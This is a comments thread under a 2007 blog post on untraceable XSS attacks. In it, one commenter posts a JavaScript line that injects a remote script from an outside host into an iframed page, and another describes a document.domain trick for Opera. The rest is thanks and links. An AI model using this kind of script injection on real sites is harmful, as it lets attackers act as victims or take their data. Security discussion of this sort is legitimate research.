Comments on Alex's Corner: (Non-Persistent) Untraceable XSS Attacks
Author: kuza55 (http://www.blogger.com/profile/03932544559060480887)
Updated: 2023-10-18T02:14:08.061+11:00

Anonymous, 2007-03-31T05:31:00.000+10:00:
Would it work if you attach a remote JavaScript to the DOM and then use ajax to perform actions on the iframed domain?

I'm using "d = frames[0].document;
x=d.createElement('script');x.src="http://www.whatever.com/s.js";d.body.appendChild(x)"
In s.js I call an xmlhttp function but in Firefox I receive an error "Error: uncaught exception: Permission denied to call method XMLHttpRequest.open".

Anonymous, 2007-03-30T20:42:00.000+10:00:
Thanks, that's a nice writeup. Just a note: this trick *does* work in Opera. You simply use document.domain='com', without any trailing dot tricks.

Anonymous, 2007-03-30T19:25:00.000+10:00:
dude, you helped me a freakin' lot :-)

check out mybeNi.tk on Saturday evening

Anonymous, 2007-03-30T14:02:00.000+10:00:
Now Alex, that's a very very smart technique though. Good one.

http://hackathology.blogspot.com